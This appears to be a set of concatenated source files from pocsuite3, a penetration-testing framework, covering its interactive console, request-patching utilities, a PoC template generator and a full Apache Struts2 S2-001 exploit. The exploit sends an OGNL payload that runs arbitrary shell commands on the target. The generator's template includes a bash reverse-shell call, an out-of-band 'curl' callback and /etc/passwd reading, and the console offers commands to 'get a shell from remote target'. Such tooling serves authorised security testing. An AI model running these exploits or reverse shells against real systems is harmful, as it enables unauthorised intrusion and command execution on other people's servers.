        targets = self.quake.search(dork, conf.max_page)
        count = 0
        if targets:
            for target in targets:
                if kb.comparison:
                    kb.comparison.add_ip(target, "Quake")
                if self.add_target(target):
                    count += 1

        info_msg = "[PLUGIN] got {0} target(s) from Quake".format(count)
        logger.info(info_msg)


register_plugin(TargetFromQuake)



# pylint: disable=E0202
import os
import re
import chardet
import prettytable
from termcolor import colored

from pocsuite3.lib.controller.controller import start
from pocsuite3.lib.core.common import banner, index_modules, data_to_stdout, module_required, \
    get_poc_name, stop_after, get_local_ip, is_ipv6_address_format, rtrim, ltrim, exec_cmd, get_file_text
from pocsuite3.lib.core.data import logger, paths, kb, conf
from pocsuite3.lib.core.enums import POC_CATEGORY, AUTOCOMPLETE_TYPE
from pocsuite3.lib.core.exception import PocsuiteBaseException, PocsuiteShellQuitException
from pocsuite3.lib.core.option import _set_listener, _set_http_referer, _set_http_user_agent, _set_network_proxy, \
    _set_network_timeout
from pocsuite3.lib.core.register import load_file_to_module
from pocsuite3.lib.core.settings import IS_WIN
from pocsuite3.lib.core.shell import auto_completion, readline


class BaseInterpreter(object):
    global_help = ""

    def __init__(self):
        self.setup()
        self.banner = ""
        self.complete = None
        # Prepare to execute system commands
        self.input_command = ''
        self.input_args = ''

    def setup(self):
        """ Initialization of third-party libraries

        Setting interpreter history.
        Setting appropriate completer function.

        :return:
        """
        auto_completion(completion=AUTOCOMPLETE_TYPE.CONSOLE, console=self.complete)

    def parse_line(self, line):
        """ Split line into command and argument.

        :param line: line to parse
        :return: (command, argument)
        """
        command, _, arg = line.strip().partition(" ")
        return command, arg.strip()

    @property
    def prompt(self):
        """ Returns prompt string """
        return ">>>"

    def get_command_handler(self, command):
        """ Parsing command and returning appropriate handler.

        :param command: command
        :return: command_handler
        """
        try:
            command_handler = getattr(self, "command_{}".format(command))
        except AttributeError:
            cmd = self.input_command + ' ' + self.input_args
            for line in exec_cmd(cmd=cmd):
                result_encoding = chardet.detect(line)['encoding']
                if result_encoding:
                    print(line.decode(result_encoding))
            raise PocsuiteBaseException("Pocsuite3 Unknown this command, and run it on system: '{}'".format(command))

        return command_handler

    def start(self):
        """ Routersploit main entry point. Starting interpreter loop. """

        while True:
            try:
                '''
                # BUG
                https://github.com/knownsec/pocsuite3/issues/317
                https://stackoverflow.com/questions/52102240/how-to-apply-coloring-formatting-to-the-displayed-text-in-input-function-simi

                colorama works by replacing sys.stdout and sys.stderr with versions that interpret ISO 6429 sequences,
                make appropriate Win32 calls to implement them,
                and send the rest of the characters on to the underlying stream.
                This explains your observations: input doesn’t use the Python-level sys.stdout.write,
                and Spyder interprets the sequences itself but is unaffected by the Win32 calls.

                The only reasonable fix seems to be to use input with no prompt :(
                '''
                self.input_command, self.input_args = self.parse_line(input(self.prompt))
                command = self.input_command.lower()
                if not command:
                    continue
                command_handler = self.get_command_handler(command)
                command_handler(self.input_args)
            except PocsuiteBaseException as warn:
                logger.warn(warn)
            except EOFError:
                logger.info("Pocsuite3 stopped")
                break
            except KeyboardInterrupt:
                logger.warn('Interrupt: use the \'exit\' command to quit')
                continue

    def complete(self, text, state):
        """Return the next possible completion for 'text'.

        If a command has not been entered, then complete against command list.
        Otherwise try to call complete_<command> to get list of completions.
        """
        if state == 0:
            original_line = readline.get_line_buffer()
            line = original_line.lstrip()
            stripped = len(original_line) - len(line)
            start_index = readline.get_begidx() - stripped
            end_index = readline.get_endidx() - stripped

            if start_index > 0:
                cmd, args = self.parse_line(line)
                if cmd == "":
                    complete_function = self.default_completer
                else:
                    try:
                        complete_function = getattr(self, "complete_" + cmd)
                    except AttributeError:
                        complete_function = self.default_completer
            else:
                complete_function = self.raw_command_completer

            self.completion_matches = complete_function(text, line, start_index, end_index)

        try:
            return self.completion_matches[state]
        except IndexError:
            return None

    def commands(self, *ignored):
        """ Returns full list of interpreter commands.

        :param ignored:
        :return: full list of interpreter commands
        """
        return [command.rsplit("_").pop() for command in dir(self) if command.startswith("command_")]

    def raw_command_completer(self, text, line, start_index, end_index):
        """ Complete command w/o any argument """
        return [command for command in self.suggested_commands() if command.startswith(text)]

    def default_completer(self, *ignored):
        return []

    def suggested_commands(self):
        """ Entry point for intelligent tab completion.

        Overwrite this method to suggest suitable commands.

        :return: list of suitable commands
        """
        return self.commands()


class PocsuiteInterpreter(BaseInterpreter):
    global_help = """Global commands:
    help                        Print this help menu
    use <module>                Select a module for usage
    search <search term>        Search for appropriate module
    list|show all               Show all available pocs
    clear                       clear the console screen
    exit                        Exit Pocsuite3"""

    module_help = """Module commands:
    run                                 Run the selected module with the given options
    back                                De-select the current module
    set <option name> <option value>    Set an option for the selected module
    setg <option name> <option value>   Set an option for all of the modules
    show [info|options|all]             Print information, options
    check                               Check if a given target is vulnerable to a selected module's attack
    attack                              Attack target and return target vulnerable infomation
    exploit                             Get a shell from remote target"""

    def __init__(self, module_directory=paths.POCSUITE_POCS_PATH):
        super(PocsuiteInterpreter, self).__init__()

        self.current_module = None
        self.raw_prompt_template = None
        self.module_prompt_template = None
        self.prompt_hostname = "Pocsuite3"
        self.show_sub_commands = (
            "info", "options", "ip", "all")

        self.global_commands = sorted(["use ", "help", "exit", "show ", "search ", "clear"])
        self.module_commands = ["run", "back", "set ", "setg ", "check"]
        self.module_commands.extend(self.global_commands)
        self.module_commands.sort()

        self.modules = index_modules(module_directory)
        self.module_parent_directory = os.sep.join(
            module_directory.rstrip(os.sep).split(os.sep)[0:-1]) + os.sep
        self.modules_count = len(self.modules)
        # init
        conf.console_mode = True
        banner()
        logger.info("Load Pocs :{}".format(self.modules_count))

        self.last_search = []
        self.last_ip = []
        self.main_modules_dirs = []
        for module in self.modules:
            temp_module = module
            temp_module = ltrim(temp_module, self.module_parent_directory).lstrip(os.sep)
            self.main_modules_dirs.append(temp_module)

        self.__parse_prompt()

    def __parse_prompt(self):
        host_colorizing = colored("{host}", attrs=['underline'])
        self.raw_prompt_template = f'{host_colorizing} > '

        # LIGHTRED_EX=91 are fairly well supported, but not part of the standard.
        self.module_prompt_template = host_colorizing + " (\033[91m{module}\033[0m) > "

    @property
    def module_metadata(self):
        return getattr(self.current_module, "pocsuite3_module_path")

    @property
    def prompt(self):
        """ Returns prompt string based on current_module attribute.

        Adding module prefix (module.name) if current_module attribute is set.

        :return: prompt string with appropriate module prefix.
        """
        if self.current_module:
            try:
                return self.module_prompt_template.format(host=self.prompt_hostname,
                                                          module=self.module_metadata)
            except (AttributeError, KeyError):
                return self.module_prompt_template.format(host=self.prompt_hostname, module="UnnamedModule")
        else:
            return self.raw_prompt_template.format(host=self.prompt_hostname)

    def command_show(self, *args, **kwargs):
        sub_command = args[0]
        func = "_show_" + sub_command
        if not hasattr(self, func):
            logger.warning("Unknown 'show' sub-command '{}'. "
                           "What do you want to show?\n"
                           "Possible choices are: {}".format(sub_command, self.show_sub_commands))
            return
        getattr(self, func)(*args, **kwargs)

    def command_exit(self, *args, **kwargs):
        raise EOFError

    def command_clear(self, *args, **kwargs):
        if IS_WIN:
            os.system('cls')
        else:
            os.system('clear')

    def command_help(self, *args, **kwargs):
        data_to_stdout(self.global_help)
        data_to_stdout("\n")
        if self.current_module:
            data_to_stdout("\n")
            data_to_stdout(self.module_help)
            data_to_stdout("\n")

    def _show_ip(self, *args, **kwargs):
        self.last_ip = []
        ips = get_local_ip(all=True)
        tb = prettytable.PrettyTable(["Index", "IP"])
        index = 0
        for item in ips:
            tb.add_row([str(index), item])
            self.last_ip.append(item)
            index += 1
        data_to_stdout("\n" + tb.get_string() + "\n")

    def command_back(self, *args, **kwargs):
        self.current_module = None

    def command_q(self, *args, **kwargs):
        if self.current_module:
            self.command_back(args, kwargs)
        else:
            self.command_exit(args, kwargs)

    def command_search(self, *args, **kwargs):
        keyword = args[0]

        if not keyword:
            logger.warning("Please specify search keyword. e.g. 'search wordpress'")
            return

        tb = prettytable.PrettyTable()
        tb.field_names = ["Index", "Path"]

        search_result = []
        for module in self.main_modules_dirs:
            m = re.search(keyword, module, re.I | re.S)
            if m:
                search_result.append((module, m.group(0)))

        index = 0
        for s, k in search_result:
            tb.add_row([index, "{}\033[31m{}\033[0m{}".format(*s.partition(k))])
            index = index + 1

        self.last_search = [i for i, j in search_result]
        data_to_stdout(tb.get_string())
        data_to_stdout("\n")

    def command_use(self, module_path, *args, **kwargs):
        if module_path.isdigit():
            index = int(module_path)
            if index >= len(self.last_search):
                logger.warning("Index out of range")
                return
            module_path = self.last_search[index]

        module_ext = ''
        module_path_found = False
        for module_ext in ['', '.py', '.yaml']:
            if os.path.exists(module_path + module_ext):
                module_path_found = True
                module_path = module_path + module_ext
                break
            elif os.path.exists(os.path.join(self.module_parent_directory, module_path + module_ext)):
                module_path_found = True
                module_path = os.path.join(self.module_parent_directory, module_path + module_ext)
                break

        if not module_path_found:
            err_msg = "No such file: '{0}'".format(module_path)
            logger.error(err_msg)
            return

        if module_ext == '':
            if module_path.endswith('.py'):
                module_ext = '.py'
            elif module_path.endswith('.yaml'):
                module_ext = '.yaml'
        try:
            load_file_to_module(module_path)
            self.current_module = kb.current_poc
            self.current_module.pocsuite3_module_path = ltrim(rtrim(module_path, module_ext),
                                                              self.module_parent_directory)
        except Exception as err:
            logger.error(str(err))

    @module_required
    def command_set(self, *args, **kwargs):
        key, _, value = args[0].partition(" ")
        if key in self.current_module.options:
            self.current_module.set_option(key, value)
            logger.info("{} => {}".format(key, value))
        elif key in self.current_module.global_options:
            self.current_module.setg_option(key, value)
            logger.info("{} => {}".format(key, value))
        elif key in self.current_module.payload_options:
            if value.isdigit() and key != "lport":
                index = int(value)
                if index >= len(self.last_ip):
                    logger.warning("Index out of range")
                    return
                value = self.last_ip[index]
            self.current_module.setp_option(key, value)
            logger.info("{} => {}".format(key, value))
        else:
            logger.error("You can't set option '{}'."
                         .format(key))

    def _attack_mode(self, mod):
        """
        根据不同模式发起不同的验证

        :param mod: 模式类型 verify|attack|shell
        :return:
        """
        # 设置全局参数
        if self.current_module.current_protocol == POC_CATEGORY.PROTOCOL.HTTP:
            target = self.current_module.getg_option("target")
        else:
            rhost = self.current_module.getg_option("rhost")
            rport = self.current_module.getg_option("rport")
            target = f"{rhost}:{rport}"
        conf.mode = mod
        kb.task_queue.put((target, self.current_module))
        try:
            start()
        except PocsuiteShellQuitException:
            pass
        kb.results = []

    def _set_global_conf(self):
        """
        设置全局的参数

        :return:
        """
        if self.current_module.current_protocol == POC_CATEGORY.PROTOCOL.HTTP:
            conf.referer = self.current_module.getg_option("referer")
            conf.agent = self.current_module.getg_option("agent")
            conf.proxy = self.current_module.getg_option("proxy")
            conf.timeout = self.current_module.getg_option("timeout")
            # 设置全局参数

            _set_http_referer()
            _set_http_user_agent()
            _set_network_proxy()
            _set_network_timeout()

    @module_required
    def command_check(self, *args, **kwargs):
        self.current_module.check_requirement(self.current_module.global_options, self.current_module.options)
        # 检测必须参数是否被设置
        self._set_global_conf()
        self._attack_mode("verify")

    @module_required
    def command_verify(self, *args, **kwargs):
        self.command_check(args, kwargs)

    @module_required
    def command_attack(self, *args, **kwargs):
        # 检测必须参数是否被设置
        self.current_module.check_requirement(self.current_module.global_options, self.current_module.options)
        self._set_global_conf()
        self._attack_mode("attack")

    @module_required
    def command_run(self, *args, **kwargs):
        self.command_attack(args, kwargs)

    @module_required
    def command_exploit(self, *args, **kwargs):
        self.current_module.check_requirement(self.current_module.payload_options, self.current_module.global_options)
        self._set_global_conf()
        conf.connect_back_host = self.current_module.getp_option("lhost")
        conf.connect_back_port = self.current_module.getp_option("lport")
        conf.mode = "shell"
        conf.ipv6 = is_ipv6_address_format(conf.connect_back_host)
        _set_listener()
        self._attack_mode("shell")

    @module_required
    def command_shell(self, *args, **kwargs):
        self.command_exploit(args, kwargs)

    @module_required
    def command_setg(self, *args, **kwargs):
        key, _, value = args[0].partition(" ")
        if key in self.current_module.global_options:
            self.current_module.setg_option(key, value)
            logger.info("{} => {}".format(key, value))
        else:
            logger.error("You can't set option '{}'.\n"
                         "Available options: {}".format(key, self.current_module.options))

    def command_list(self, *args, **kwargs):
        # 展现所有可用的poc
        search_result = []
        tb = prettytable.PrettyTable(["Index", "Path", "Name"])
        index = 0
        for tmp_module in self.main_modules_dirs:
            found = os.path.join(self.module_parent_directory, tmp_module + ".py")
            if not os.path.exists(found):
                found = os.path.join(self.module_parent_directory, tmp_module + ".yaml")
            code = get_file_text(found)
            name = get_poc_name(code)
            tb.add_row([str(index), tmp_module, name])
            search_result.append(tmp_module)
            index += 1
        data_to_stdout("\n" + tb.get_string() + "\n")
        self.last_search = search_result

    def _show_all(self, *args, **kwargs):
        if self.current_module is None:
            self.command_list(args, kwargs)
        else:
            self._show_info(args, kwargs)
            self._show_options(args, kwargs)

    @module_required
    def _show_info(self, *args, **kwargs):
        fields = ["name", "VulID", "version", "author", "vulDate", "createDate", "updateDate", "references",
                  "appPowerLink", "appName", "appVersion", "vulType", "desc"]
        msg = ""
        for field in fields:
            value = getattr(self.current_module, field, None)
            if value:
                value = str(value).strip()
                # for name highlight
                if field == "name":
                    value = colored(value, "green")
                msg = msg + "%-20s %-10s\n" % (field, value)
        data_to_stdout("\n")
        data_to_stdout(msg)
        data_to_stdout("\n")

    @module_required
    def _show_options(self, *args, **kwargs):
        global_options = self.current_module.global_options
        module_options = self.current_module.options
        payload_options = self.current_module.payload_options

        tb2 = prettytable.PrettyTable(["Name", "Current settings", "Type", "Descript"])
        for name, opt in global_options.items():
            value = opt.value
            if opt.require and value == "":
                value = colored("*require*", "red")
            tb2.add_row([name, value, opt.type, opt.description])
        data_to_stdout("\nTarget options:\n")
        data_to_stdout(tb2.get_string())
        data_to_stdout("\n")

        if module_options:
            tb = prettytable.PrettyTable(["Name", "Current settings", "Type", "Descript"])
            # add target option
            for name, opt in module_options.items():
                value = opt.value
                if opt.require and value == "":
                    value = colored("*require*", "red")
                tb.add_row([name, value, opt.type, opt.description])
            data_to_stdout("\nModule options:\n")
            data_to_stdout(tb.get_string())
            data_to_stdout("\n")

        # exploit payload
        if payload_options:
            tb3 = prettytable.PrettyTable(["Name", "Current settings", "Type", "Descript"])
            for name, opt in payload_options.items():
                value = opt.value
                if opt.require and value == "":
                    value = colored("*require*", "red")
                tb3.add_row([name, value, opt.type, opt.description])
            data_to_stdout("\nPayload options (reverse_tcp):\n")
            data_to_stdout(tb3.get_string())
            data_to_stdout("\n")

        data_to_stdout("\n")

    @stop_after(2)
    def complete_use(self, text, *args, **kwargs):

        if text:
            all_possible_matches = filter(lambda x: x.startswith(text), self.main_modules_dirs)

            matches = set()
            for match in all_possible_matches:
                head, sep, tail = match[len(text):].partition('.')
                if not tail:
                    sep = ""
                matches.add("".join((text, head, sep)))
            return list(matches)

        else:
            return self.main_modules_dirs

    @stop_after(2)
    def complete_show(self, text, *args, **kwargs):

        if text:
            all_possible_matches = filter(lambda x: x.startswith(text), self.show_sub_commands)
            return list(all_possible_matches)

        else:
            return self.show_sub_commands

    @module_required
    @stop_after(2)
    def complete_set(self, text, *args, **kwargs):
        all_options = self.current_module.get_options().keys()

        if text:
            all_possible_matches = filter(lambda x: x.startswith(text), all_options)
            return list(all_possible_matches)

        else:
            return []



from dataclasses import dataclass, field
from typing import List

from pocsuite3.lib.yaml.nuclei.model import Info, CaseInsensitiveEnum
from pocsuite3.lib.yaml.nuclei.protocols.http import HttpRequest
from pocsuite3.lib.yaml.nuclei.protocols.network import NetworkRequest


class ProtocolType(CaseInsensitiveEnum):
    InvalidProtocol = "invalid"
    DNSProtocol = "dns"
    FileProtocol = "file"
    HTTPProtocol = "http"
    HeadlessProtocol = "headless"
    NetworkProtocol = "network"
    WorkflowProtocol = "workflow"
    SSLProtocol = "ssl"
    WebsocketProtocol = "websocket"
    WHOISProtocol = "whois"


@dataclass
class Template:
    """Template is a YAML input file which defines all the requests and other metadata for a template.
    """
    id: str = ''
    info: Info = field(default_factory=Info)
    requests: List[HttpRequest] = field(default_factory=list)
    network: List[NetworkRequest] = field(default_factory=list)
    stop_at_first_match: bool = True
    variables: dict = field(default_factory=dict)



import random
import re
from collections import OrderedDict
from urllib.parse import quote

from pocsuite3.api import Output, POCBase, POC_CATEGORY, register_poc, requests
from pocsuite3.lib.core.enums import VUL_TYPE
from pocsuite3.lib.core.interpreter_option import OptString


class DemoPOC(POCBase):
    vulID = ''  # ssvid
    version = '1.0'
    author = ['knownsec.com']
    vulDate = '2029-5-8'
    createDate = '2019-5-8'
    updateDate = '2019-5-8'
    references = ['https://cwiki.apache.org/confluence/display/WW/S2-001']
    name = 'Apache Struts2 s2-001'
    appPowerLink = ''
    appName = 'Apache Struts2'
    appVersion = '2.0.0-2.0.8'
    vulType = VUL_TYPE.CODE_EXECUTION
    desc = '''S2-001:影响版本Struts 2.0.0-2.0.8'''
    samples = []
    category = POC_CATEGORY.EXPLOITS.WEBAPP
    dockerfile = '''FROM isxiangyang/struts2-all-vul-pocsuite:latest'''

    def _options(self):
        o = OrderedDict()
        o["command"] = OptString('', description="可执行的shell命令")
        return o

    def _check(self):
        result = {}
        check_poc = "%25%7B{num1}%2B{num2}%7D"
        headers = {}
        headers['Content-Type'] = 'application/x-www-form-urlencoded'
        data = "username=test&password={exp}"
        num1 = random.randint(10000, 100000)
        num2 = random.randint(10000, 100000)
        poc = check_poc.format(num1=num1, num2=num2)
        data = data.format(exp=poc)
        html = requests.post(self.url, data=data, headers=headers).text
        nn = str(num1 + num2)
        if nn in html:
            result["VerifyInfo"] = {
                "URL": self.url,
                "PAYLOAD": data
            }
            return result
        return False

    def _verify(self):
        p = self._check()
        if p:
            return self.parse_output(p)

    def _attack(self):
        p = self._check()
        result = {}
        if p:
            cmd = self.get_option("command")
            exec_payload = "%{#a=(new java.lang.ProcessBuilder(new java.lang.String[]{\"" + f"{cmd}" + "\"})).redirectErrorStream(true).start(),#b=#a.getInputStream(),#c=new java.io.InputStreamReader(#b),#d=new java.io.BufferedReader(#c),#e=new char[50000],#d.read(#e),#f=#context.get(\"com.opensymphony.xwork2.dispatcher.HttpServletResponse\"),#f.getWriter().println(new java.lang.String(#e)),#f.getWriter().flush(),#f.getWriter().close()}"
            headers = {}
            headers['Content-Type'] = 'application/x-www-form-urlencoded'
            exec_payload = quote(exec_payload)
            data = f"username=test&password={exec_payload}"
            html = requests.post(self.url, data=data, headers=headers).text
            pattern = re.compile(r"</tr>\r\n(.*)")
            matches = pattern.findall(html)
            if html:
                result["VerifyInfo"] = {
                    "URL": self.url,
                    "result": matches
                }
        return self.parse_output(result)

    def parse_output(self, result):
        output = Output(self)
        if result:
            output.success(result)
        else:
            output.fail('target is not vulnerable')
        return output


register_poc(DemoPOC)



from pocsuite3.lib.utils import urlparse


class URL:

    def __init__(self, schema: bytes, host: bytes, port, path: bytes,
                 query: bytes, fragment: bytes, userinfo: bytes):
        self.schema = schema.decode('utf-8')
        self.host = host.decode('utf-8')
        if port and port != 0:
            self.port = port
        else:
            if schema == b'https':
                self.port = 443
            else:
                self.port = 80
        self.path = path.decode('utf-8') if path else ''
        self.query = query.decode('utf-8') if query else None
        self.fragment = fragment.decode('utf-8') if fragment else None
        self.userinfo = userinfo.decode('utf-8') if userinfo else None
        self.netloc = self.schema + '://' + self.host + ':' + str(self.port)

    @property
    def raw(self):
        return self.netloc + (self.path or '') + (self.query or '') + (self.fragment or '')

    def __repr__(self):
        return ('<URL schema: {!r}, host: {!r}, port: {!r}, path: {!r}, '
                'query: {!r}, fragment: {!r}, userinfo: {!r}>'
                .format(self.schema, self.host, self.port, self.path, self.query, self.fragment, self.userinfo))


def parse_url(url):
    try:
        parsed = urlparse(url)
        userinfo = b'{parsed.username}:{parsed.password}'
        return URL(parsed.scheme, parsed.hostname, parsed.port, parsed.path, parsed.query, parsed.fragment, userinfo)
    except Exception:
        raise("invalid url {!r}".format(url))



import urllib3

from pocsuite3.lib.core.exception import PocsuiteIncompleteRead
from .remove_ssl_verify import remove_ssl_verify
from .remove_warnings import disable_warnings
from .hook_request import patch_session
from .add_httpraw import patch_addraw
from .hook_request_redirect import patch_redirect
from .hook_urllib3_parse_url import patch_urllib3_parse_url
from .unquote_request_uri import unquote_request_uri


def patch_all():
    # fix https://github.com/urllib3/urllib3/issues/1790
    patch_urllib3_parse_url()
    unquote_request_uri()
    urllib3.response.HTTPResponse._update_chunk_length = _update_chunk_length
    disable_warnings()
    remove_ssl_verify()
    patch_session()
    patch_addraw()
    patch_redirect()


def _update_chunk_length(self):
    # First, we'll figure out length of a chunk and then
    # we'll try to read it from socket.
    # Fix some chunked errors that urllib3 does not recognize
    if self.chunk_left is not None:
        return
    line = self._fp.fp.readline()
    line = line.split(b";", 1)[0]
    if not line:
        self.chunk_left = 0
        return
    try:
        self.chunk_left = int(line, 16)
    except ValueError:
        # Invalid chunked protocol response, abort.
        self.close()
        raise PocsuiteIncompleteRead(line)



import json

from pocsuite3.lib.yaml.nuclei.protocols.common.expressions import evaluate, UNRESOLVED_VARIABLE, Marker


class UnresolvedVariableException(Exception):
    pass


def marker_replace(data, dynamic_values):
    """replaces placeholders in template with values
    """
    data = json.dumps(data)
    for k, v in dynamic_values.items():
        if k in data:
            data = data.replace(f'{Marker.General}{k}{Marker.General}', str(v))
            data = data.replace(f'{Marker.ParenthesisOpen}{k}{Marker.ParenthesisClose}', str(v))

    # execute various helper functions
    data = evaluate(data, dynamic_values)

    if UNRESOLVED_VARIABLE in data:
        raise UnresolvedVariableException

    return json.loads(data)



import requests
import urllib3
from requests.exceptions import InvalidURL
from urllib.parse import quote


# The unreserved URI characters (RFC 3986)
UNRESERVED_SET = frozenset(
    "ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz" + "0123456789-._~")


def unquote_unreserved(uri):
    """Un-escape any percent-escape sequences in a URI that are unreserved
    characters. This leaves all reserved, illegal and non-ASCII bytes encoded.
    :rtype: str
    """
    parts = uri.split('%')
    for i in range(1, len(parts)):
        h = parts[i][0:2]
        if len(h) == 2 and h.isalnum():
            try:
                c = chr(int(h, 16))
            except ValueError:
                raise InvalidURL("Invalid percent-escape sequence: '%s'" % h)

            if c in UNRESERVED_SET:
                parts[i] = c + parts[i][2:]
            else:
                parts[i] = '%' + parts[i]
        else:
            parts[i] = '%' + parts[i]
    return ''.join(parts)


def patched_requote_uri(uri):
    """Re-quote the given URI.
    This function passes the given URI through an unquote/quote cycle to
    ensure that it is fully and consistently quoted.
    :rtype: str
    """
    safe_with_percent = "!\"#$%&\'()*+,-./:;<=>?@[\\]^_`{|}~"
    safe_without_percent = "!\"#$&\'()*+,-./:;<=>?@[\\]^_`{|}~"
    try:
        # Unquote only the unreserved characters
        # Then quote only illegal characters (do not quote reserved,
        # unreserved, or '%')
        return quote(unquote_unreserved(uri), safe=safe_with_percent)
    except InvalidURL:
        # We couldn't unquote the given URI, so let's try quoting it, but
        # there may be unquoted '%'s in the URI. We need to make sure they're
        # properly quoted so they do not cause issues elsewhere.
        return quote(uri, safe=safe_without_percent)


def patched_encode_target(target):
    return target


def unquote_request_uri():
    try:
        requests.utils.requote_uri.__code__ = patched_requote_uri.__code__
    except Exception:
        pass

    try:
        urllib3.util.url._encode_target.__code__ = patched_encode_target.__code__
    except Exception:
        pass



import sys
import datetime
from collections import OrderedDict
from pocsuite3 import __version__
from pocsuite3.lib.core.data import logger, conf


def new_poc():
    print('You are about to be asked to enter information that will be used to create a poc template.\n'
          'There are quite a few fields but you can leave some blank.\n'
          'For some fields there will be a default value.\n'
          '-----')

    today = datetime.date.today().strftime('%Y-%m-%d')
    vulID = input('Seebug ssvid (eg, 99335) [0]: ') or '0'
    author = input('PoC author (eg, Seebug) []: ')
    vulDate = input(f'Vulnerability disclosure date (eg, 2021-8-18) [{today}]: ') or today

    references = ''
    if vulID.isdigit() and int(vulID) > 0:
        references = f'https://www.seebug.org/vuldb/ssvid-{vulID}'
    references = input(f'Advisory URL (eg, https://www.seebug.org/vuldb/ssvid-99335) [{references}]: ') or references
    references = list(filter(None, list(map(str.strip, references.split(',')))))

    cveNumber = input('Vulnerability CVE number (eg, CVE-2021-22123) []: ')
    vendorName = input('Vendor name (eg, Fortinet) []: ')
    appName = input('Product or component name (eg, FortiWeb) []: ')
    appVersion = input('Affected version (eg, <=6.4.0) []: ')
    appPowerLink = input('Vendor homepage (eg, https://www.fortinet.com) []: ')

    vulTypes = [
        'Arbitrary File Read',
        'Code Execution',
        'Command Execution',
        'Denial Of service',
        'Information Disclosure',
        'Login Bypass',
        'Path Traversal',
        'SQL Injection',
        'SSRF',
        'XSS'
    ]
    message = '\n'
    for i, vul in enumerate(vulTypes):
        message += "{0}    {1}\n".format(i, vul)
    print(message)

    vulType = input('Vulnerability type, choose from above or provide (eg, 3) []: ') or 'Other'
    if vulType.isdigit() and int(vulType) < len(vulTypes):
        vulType = vulTypes[int(vulType)]

    needAuth = input('Authentication Required (eg, yes) [no]: ')
    needAuth = True if needAuth.lower().startswith('y') else False

    rceVul = True if vulType in ['Code Execution', 'Command Execution'] else False

    echoRce = False
    oobServer = ''
    if rceVul:
        echoRce = input('Can we get result of command (eg, yes) [no]: ')
        echoRce = True if echoRce.lower().startswith('y') else False
        if not echoRce:
            oobServer = input('Out-of-band server to use (eg, interactsh) [ceye]: ')
            oobServer = 'interactsh' if oobServer.lower().startswith('i') else 'ceye'

    pocName = [vendorName, appName]
    if needAuth:
        pocName.append('Post-Auth')
    else:
        pocName.append('Pre-Auth')
    pocName.append(vulType)
    if cveNumber:
        pocName.append(f'({cveNumber})')
    pocName = ' '.join(list(filter(None, pocName)))
    pocName = input(f'PoC name [{pocName}]: ') or pocName

    codes = OrderedDict([
        (0, '#!/usr/bin/env python3'),
        (1, '# -*- coding: utf-8 -*-'),
        (2, ''),
        (3, 'from pocsuite3.api import ('),
        (4, '    minimum_version_required, POCBase, register_poc, requests, logger,'),
        (5, '    OptString, OrderedDict,'),
        (6, '    random_str,'),
        (7, '    CEye,'),
        (8, '    Interactsh,'),
        (9, '    get_listener_ip, get_listener_port, REVERSE_PAYLOAD'),
        (10, ')'),
        (11, ''),
        (12, "minimum_version_required('%s')" % __version__),
        (13, ''),
        (14, ''),
        (15, 'class DemoPOC(POCBase):'),
        (16, "    vulID = '%s'" % vulID),
        (17, "    version = '1'"),
        (18, "    author = '%s'" % author),
        (19, "    vulDate = '%s'" % vulDate),
        (20, "    createDate = '%s'" % today),
        (21, "    updateDate = '%s'" % today),
        (22, "    references = %s" % str(references)),
        (23, "    name = '%s'" % pocName),
        (24, "    appPowerLink = '%s'" % appPowerLink),
        (25, "    appName = '%s'" % appName),
        (26, "    appVersion = '%s'" % appVersion),
        (27, "    vulType = '%s'" % vulType),
        (28, "    desc = 'Vulnerability description'"),
        (29, "    samples = ['']"),
        (30, "    install_requires = ['']"),
        (31, "    pocDesc = 'User manual of poc'"),
        (32, "    dork = {'zoomeye': ''}"),
        (33, "    suricata_request = ''"),
        (34, "    suricata_response = ''"),
        (35, ''),
        (36, '    def _options(self):'),
        (37, '        o = OrderedDict()'),
        (38, "        o['user'] = OptString('', description='The username to authenticate as', require=True)"),
        (39, "        o['pwd'] = OptString('', description='The password for the username', require=True)"),
        (40, "        o['cmd'] = OptString('uname -a', description='The command to execute')"),
        (41, "        o['filepath'] = OptString('/etc/passwd', description='The full path to the file to read')"),
        (97, "        o['param'] = OptString('', description='The param')"),
        (42, '        return o'),
        (43, ''),
        (44, "    def _exploit(self, param=''):"),
        (45, "        if not self._check(dork=''):"),
        (46, '            return False'),
        (47, ''),
        (48, "        user = self.get_option('user')"),
        (49, "        pwd = self.get_option('pwd')"),
        (50, "        headers = {'Content-Type': 'application/x-www-form-urlencoded'}"),
        (51, "        payload = 'a=b'"),
        (52, '        res = requests.post(self.url, headers=headers, data=payload)'),
        (100, '        logger.debug(res.text)'),
        (53, '        return res.text'),
        (54, ''),
        (55, '    def _verify(self):'),
        (56, '        result = {}'),
        (57, "        param = ''"),
        (58, '        flag = random_str(6)'),
        (59, "        param = f'echo {flag}'"),
        (60, '        oob = Interactsh()'),
        (61, "        url, flag = oob.build_request()"),
        (62, '        oob = CEye()'),
        (63, "        v = oob.build_request(value='')"),
        (64, "        url, flag = v['url'], v['flag']"),
        (65, "        param = f'curl {url}'"),
        (99, "        param = '/etc/passwd'"),
        (66, '        res = self._exploit(param)'),
        (67, '        if res:'),
        (68, '        if res and flag in res:'),
        (69, '        if oob.verify(flag):'),
        (70, '        if oob.verify_request(flag):'),
        (98, "        if res and ':/bin/' in res:"),
        (71, "            result['VerifyInfo'] = {}"),
        (72, "            result['VerifyInfo']['URL'] = self.url"),
        (73, "            result['VerifyInfo'][param] = res"),
        (74, '        return self.parse_output(result)'),
        (75, ''),
        (76, '    def _attack(self):'),
        (78, '        result = {}'),
        (79, "        param = self.get_option('cmd')"),
        (80, "        param = self.get_option('filepath')"),
        (81, "        param = self.get_option('param')"),
        (82, '        res = self._exploit(param)'),
        (83, "        result['VerifyInfo'] = {}"),
        (84, "        result['VerifyInfo']['URL'] = self.url"),
        (85, "        result['VerifyInfo'][param] = res"),
        (86, '        return self.parse_output(result)'),
        (87, ''),
        (88, '    def _shell(self):'),
        (89, '        return self._verify()'),
        (90, '        try:'),
        (91, '            self._exploit(REVERSE_PAYLOAD.BASH.format(get_listener_ip(), get_listener_port()))'),
        (92, '        except Exception:'),
        (93, '            pass'),
        (94, ''),
        (95, ''),
        (96, 'register_poc(DemoPOC)')])

    rows_to_remove = list()

    if oobServer != 'ceye':
        rows_to_remove += [7, 62, 63, 64, 70]

    if oobServer != 'interactsh':
        rows_to_remove += [8, 60, 61, 69]

    if oobServer == '':
        rows_to_remove += [65]

    if not echoRce:
        rows_to_remove += [58, 59, 68]

    if not needAuth:
        rows_to_remove += [38, 39, 48, 49]

